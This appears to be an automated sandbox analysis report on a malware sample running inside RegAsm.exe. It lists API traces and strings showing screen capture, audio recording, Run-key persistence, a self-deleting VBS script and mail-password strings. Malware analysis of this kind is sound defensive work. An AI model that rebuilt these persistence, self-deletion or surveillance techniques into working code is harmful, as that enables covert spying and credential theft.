                                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                • String ID:
                                                                • API String ID: 1663032902-0
                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                • String ID:
                                                                • API String ID: 2692324296-0
                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                APIs
                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID:
                                                                • API String ID: 1084509184-0
                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                • GetIconInfo.USER32 ref: 00418FF8
                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 4256916514-865373369
                                                                • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-1447701601
                                                                • Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                • Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A11986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                • API String ID: 3797177996-2483056239
                                                                • Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                • Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                • lstrcatW.KERNEL32 ref: 0041263C
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-436679193
                                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                APIs
                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                • API String ID: 738084811-2094122233
                                                                • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$Create
                                                                • String ID: RIFF$WAVE$data$fmt
                                                                • API String ID: 1602526932-4212202414
                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                • API String ID: 1646373207-255920310
                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                • API String ID: 4218353326-3023110444
                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                • CopyFileW.KERNEL32 ref: 0040CFBF
